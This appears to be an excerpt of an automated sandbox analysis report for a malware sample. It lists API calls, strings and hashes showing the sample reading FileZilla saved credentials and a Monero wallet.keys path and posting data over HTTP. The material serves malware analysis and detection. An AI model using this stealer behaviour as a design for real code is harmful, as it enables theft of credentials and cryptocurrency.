GetProcAddress.KERNEL32(6FF20000,00EBCB70), ref: 003DA6FD

Strings

@e, xrefs: 003DA35D
@f, xrefs: 003DA6BF
c, xrefs: 003DA005
@d, xrefs: 003DA16B
d, xrefs: 003DA280
e, xrefs: 003DA5CD
@g, xrefs: 003D9E4F
d, xrefs: 003DA1E5
`g, xrefs: 003D9F8C
HttpQueryInfoA, xrefs: 003DA5FC
c, xrefs: 003DA686
`f, xrefs: 003DA0CC
InternetSetOptionA, xrefs: 003DA5E5
@c, xrefs: 003DA4E5
`h, xrefs: 003D9D2B
`e, xrefs: 003DA428
`d, xrefs: 003DA3D6
e, xrefs: 003DA307
g, xrefs: 003D9C20
f, xrefs: 003DA237

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: c$ d$ e$ f$ g$@c$@d$@e$@f$@g$HttpQueryInfoA$InternetSetOptionA$`d$`e$`f$`g$`h$c$d$e
API String ID: 2238633743-3130169728
Opcode ID: 74161ef00cec526be61547549bcbf7e871c5d918f3cfc5324f0c4786ea3fa604
Instruction ID: ac9773cab5ab0017c059a6b0900aee5975d0ceb51b08f029f12d936759f5ceb4
Opcode Fuzzy Hash: 74161ef00cec526be61547549bcbf7e871c5d918f3cfc5324f0c4786ea3fa604
Instruction Fuzzy Hash: 9C621DB9590300AFC345DFE8ED889A737FBF74C381714E61AE609C3264E6799841DB52

Function 003C7710 Relevance: 98.6, APIs: 54, Strings: 2, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003C7724
RtlAllocateHeap.NTDLL(00000000), ref: 003C772B
lstrcat.KERNEL32(?,00EB94E8), ref: 003C78DB
lstrcat.KERNEL32(?,?), ref: 003C78EF
lstrcat.KERNEL32(?,?), ref: 003C7903
lstrcat.KERNEL32(?,?), ref: 003C7917
lstrcat.KERNEL32(?,00EBDE20), ref: 003C792B
lstrcat.KERNEL32(?,00EBDE50), ref: 003C793F
lstrcat.KERNEL32(?,00EBDE68), ref: 003C7952
lstrcat.KERNEL32(?,00EBDE80), ref: 003C7966
lstrcat.KERNEL32(?,00EBDFF8), ref: 003C797A
lstrcat.KERNEL32(?,?), ref: 003C798E
lstrcat.KERNEL32(?,?), ref: 003C79A2
lstrcat.KERNEL32(?,?), ref: 003C79B6
lstrcat.KERNEL32(?,00EBDE20), ref: 003C79C9
lstrcat.KERNEL32(?,00EBDE50), ref: 003C79DD
lstrcat.KERNEL32(?,00EBDE68), ref: 003C79F1
lstrcat.KERNEL32(?,00EBDE80), ref: 003C7A04
lstrcat.KERNEL32(?,00EBE060), ref: 003C7A18
lstrcat.KERNEL32(?,?), ref: 003C7A2C
lstrcat.KERNEL32(?,?), ref: 003C7A40
lstrcat.KERNEL32(?,?), ref: 003C7A54
lstrcat.KERNEL32(?,00EBDE20), ref: 003C7A68
lstrcat.KERNEL32(?,00EBDE50), ref: 003C7A7B
lstrcat.KERNEL32(?,00EBDE68), ref: 003C7A8F
lstrcat.KERNEL32(?,00EBDE80), ref: 003C7AA3
lstrcat.KERNEL32(?,00EBE0C8), ref: 003C7AB6
lstrcat.KERNEL32(?,?), ref: 003C7ACA
lstrcat.KERNEL32(?,?), ref: 003C7ADE
lstrcat.KERNEL32(?,?), ref: 003C7AF2
lstrcat.KERNEL32(?,00EBDE20), ref: 003C7B06
lstrcat.KERNEL32(?,00EBDE50), ref: 003C7B1A
lstrcat.KERNEL32(?,00EBDE68), ref: 003C7B2D
lstrcat.KERNEL32(?,00EBDE80), ref: 003C7B41
lstrcat.KERNEL32(?,00EBE130), ref: 003C7B55
lstrcat.KERNEL32(?,?), ref: 003C7B69
lstrcat.KERNEL32(?,?), ref: 003C7B7D
lstrcat.KERNEL32(?,?), ref: 003C7B91
lstrcat.KERNEL32(?,00EBDE20), ref: 003C7BA4
lstrcat.KERNEL32(?,00EBDE50), ref: 003C7BB8
lstrcat.KERNEL32(?,00EBDE68), ref: 003C7BCC
lstrcat.KERNEL32(?,00EBDE80), ref: 003C7BDF
lstrcat.KERNEL32(?,00EBE198), ref: 003C7BF3
lstrcat.KERNEL32(?,?), ref: 003C7C07
lstrcat.KERNEL32(?,?), ref: 003C7C1B
lstrcat.KERNEL32(?,?), ref: 003C7C2F
lstrcat.KERNEL32(?,00EBDE20), ref: 003C7C43
lstrcat.KERNEL32(?,00EBDE50), ref: 003C7C56
lstrcat.KERNEL32(?,00EBDE68), ref: 003C7C6A
lstrcat.KERNEL32(?,00EBDE80), ref: 003C7C7E

Part of subcall function 003C75D0: lstrcat.KERNEL32(3583D020,003E17FC), ref: 003C7606
Part of subcall function 003C75D0: lstrcat.KERNEL32(3583D020,00000000), ref: 003C7648
Part of subcall function 003C75D0: lstrcat.KERNEL32(3583D020, : ), ref: 003C765A
Part of subcall function 003C75D0: lstrcat.KERNEL32(3583D020,00000000), ref: 003C768F
Part of subcall function 003C75D0: lstrcat.KERNEL32(3583D020,003E1804), ref: 003C76A0
Part of subcall function 003C75D0: lstrcat.KERNEL32(3583D020,00000000), ref: 003C76D3
Part of subcall function 003C75D0: lstrcat.KERNEL32(3583D020,003E1808), ref: 003C76ED
Part of subcall function 003C75D0: task.LIBCPMTD ref: 003C76FB

lstrcat.KERNEL32(?,00EBE490), ref: 003C7E0B
lstrcat.KERNEL32(?,00EBD138), ref: 003C7E1E
lstrlen.KERNEL32(3583D020), ref: 003C7E2B
lstrlen.KERNEL32(3583D020), ref: 003C7E3B

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Strings

`, xrefs: 003C7A0A
0, xrefs: 003C7B47

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID: 0$`
API String ID: 928082926-1112799572
Opcode ID: 2eea1f3d4504189e742cee7a7c051878b8ff9e2c98bc3a9e7477457392e13266
Instruction ID: 4dee3fbc631a712b6f4e7b263e4fb641fb0eff20249ed6cffe66f7e3bb0e6da4
Opcode Fuzzy Hash: 2eea1f3d4504189e742cee7a7c051878b8ff9e2c98bc3a9e7477457392e13266
Instruction Fuzzy Hash: 32322DB6940314ABCB15EBA0DC85DEF737DBB48700F045A89F209A6190EF74E78A8F51

Function 003D0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003D8E0B

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Part of subcall function 003C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003C99EC
Part of subcall function 003C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003C9A11
Part of subcall function 003C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003C9A31
Part of subcall function 003C99C0: ReadFile.KERNEL32(000000FF,?,00000000,003C148F,00000000), ref: 003C9A5A
Part of subcall function 003C99C0: LocalFree.KERNEL32(003C148F), ref: 003C9A90
Part of subcall function 003C99C0: CloseHandle.KERNEL32(000000FF), ref: 003C9A9A

Part of subcall function 003D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003D8E52

GetProcessHeap.KERNEL32(00000000,000F423F,003E0DBA,003E0DB7,003E0DB6,003E0DB3), ref: 003D0362
RtlAllocateHeap.NTDLL(00000000), ref: 003D0369
StrStrA.SHLWAPI(00000000,<Host>), ref: 003D0385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003E0DB2), ref: 003D0393
StrStrA.SHLWAPI(00000000,<Port>), ref: 003D03CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003E0DB2), ref: 003D03DD
StrStrA.SHLWAPI(00000000,<User>), ref: 003D0419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003E0DB2), ref: 003D0427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 003D0463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003E0DB2), ref: 003D0475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003E0DB2), ref: 003D0502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003E0DB2), ref: 003D051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003E0DB2), ref: 003D0532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003E0DB2), ref: 003D054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 003D0562
lstrcat.KERNEL32(?,profile: null), ref: 003D0571
lstrcat.KERNEL32(?,url: ), ref: 003D0580
lstrcat.KERNEL32(?,00000000), ref: 003D0593
lstrcat.KERNEL32(?,003E1678), ref: 003D05A2
lstrcat.KERNEL32(?,00000000), ref: 003D05B5
lstrcat.KERNEL32(?,003E167C), ref: 003D05C4
lstrcat.KERNEL32(?,login: ), ref: 003D05D3
lstrcat.KERNEL32(?,00000000), ref: 003D05E6
lstrcat.KERNEL32(?,003E1688), ref: 003D05F5
lstrcat.KERNEL32(?,password: ), ref: 003D0604
lstrcat.KERNEL32(?,00000000), ref: 003D0617
lstrcat.KERNEL32(?,003E1698), ref: 003D0626
lstrcat.KERNEL32(?,003E169C), ref: 003D0635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003E0DB2), ref: 003D068E

Strings

url: , xrefs: 003D0577
profile: null, xrefs: 003D0568
password: , xrefs: 003D05FB
<User>, xrefs: 003D0410
<Pass encoding="base64">, xrefs: 003D045A
browser: FileZilla, xrefs: 003D0559
<Host>, xrefs: 003D037C
login: , xrefs: 003D05CA
<Port>, xrefs: 003D03C6
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 003D02A4

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: 27a8b9091f99da07d96aca9ae5b82276439a0bbcf443128728c09129e9905946
Instruction ID: 9f08b3d40afdd46d4f747486da4b77230a5ef88d3cffe20acba6f620795b0628
Opcode Fuzzy Hash: 27a8b9091f99da07d96aca9ae5b82276439a0bbcf443128728c09129e9905946
Instruction Fuzzy Hash: 55D15472940208ABCB05EBF4ED96EEE7739FF14700F408519F502AA291EF74AA45DB61

Function 003C5100 Relevance: 56.6, APIs: 19, Strings: 13, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Part of subcall function 003C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003C4839
Part of subcall function 003C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003C4849

lstrlen.KERNEL32(00000000), ref: 003C5193

Part of subcall function 003D8EA0: CryptBinaryToStringA.CRYPT32(00000000,003C5184,40000001,00000000,00000000,?,003C5184), ref: 003D8EC0

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003C5207
StrCmpCA.SHLWAPI(?,00EBE4E0), ref: 003C5225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003C5340
HttpOpenRequestA.WININET(00000000,00EBE560,?,00EBDAF0,00000000,00000000,00400100,00000000), ref: 003C53A4

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,00EBE460,00000000,?,00EB9998,00000000,?,003E19DC,00000000,?,003D51CF), ref: 003C5737
lstrlen.KERNEL32(00000000), ref: 003C574B
GetProcessHeap.KERNEL32(00000000,?), ref: 003C575C
RtlAllocateHeap.NTDLL(00000000), ref: 003C5763
lstrlen.KERNEL32(00000000), ref: 003C5778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003C57A9
lstrlen.KERNEL32(00000000), ref: 003C57C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003C57E1
lstrlen.KERNEL32(00000000,?,?), ref: 003C580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 003C5822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003C584D
InternetCloseHandle.WININET(00000000), ref: 003C58B1
InternetCloseHandle.WININET(00000000), ref: 003C58BE
InternetCloseHandle.WININET(00000000), ref: 003C58C8

Strings

, xrefs: 003C5217
", xrefs: 003C5482
P, xrefs: 003C5458
`, xrefs: 003C56DC
", xrefs: 003C55C4
", xrefs: 003C5706
--, xrefs: 003C5280
------, xrefs: 003C53B7
------, xrefs: 003C563B
------, xrefs: 003C54F9
de-DE, xrefs: 003C5375
`, xrefs: 003C5396
------, xrefs: 003C5297

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------$P$`$`$de-DE$
API String ID: 1224485577-1812786298
Opcode ID: f7fae9b179fe8c303f187b213d03acc5ee8a6a9d55961f5173bd92c99b401fb0
Instruction ID: 5ae168abb9b09728168031cc898e2fab33dd63aa905dcbe1cf6b1c56d02ce622
Opcode Fuzzy Hash: f7fae9b179fe8c303f187b213d03acc5ee8a6a9d55961f5173bd92c99b401fb0
Instruction Fuzzy Hash: 9A329473920618ABDB16EBA0ED91FEE7378BF14700F40415AF5066A192EF702B49DF51

Function 003C5960 Relevance: 47.7, APIs: 17, Strings: 10, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Part of subcall function 003C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003C4839
Part of subcall function 003C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003C4849

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003C59F8
StrCmpCA.SHLWAPI(?,00EBE4E0), ref: 003C5A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003C5B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00EBE520,00000000,?,00EB9998,00000000,?,003E1A1C), ref: 003C5E71
lstrlen.KERNEL32(00000000), ref: 003C5E82
GetProcessHeap.KERNEL32(00000000,?), ref: 003C5E93
RtlAllocateHeap.NTDLL(00000000), ref: 003C5E9A
lstrlen.KERNEL32(00000000), ref: 003C5EAF
lstrlen.KERNEL32(00000000), ref: 003C5ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003C5EF1
lstrlen.KERNEL32(00000000,?,?), ref: 003C5F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 003C5F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 003C5F4C
InternetCloseHandle.WININET(00000000), ref: 003C5FB0
InternetCloseHandle.WININET(00000000), ref: 003C5FBD
HttpOpenRequestA.WININET(00000000,00EBE560,?,00EBDAF0,00000000,00000000,00400100,00000000), ref: 003C5BF8

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

InternetCloseHandle.WININET(00000000), ref: 003C5FC7

Strings

, xrefs: 003C5A08
", xrefs: 003C5E16
------, xrefs: 003C5D4C
P, xrefs: 003C5CAC
------, xrefs: 003C5C0B
, xrefs: 003C5DED
de-DE, xrefs: 003C5BC8
------, xrefs: 003C5A96
`, xrefs: 003C5BEA
", xrefs: 003C5CD5

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
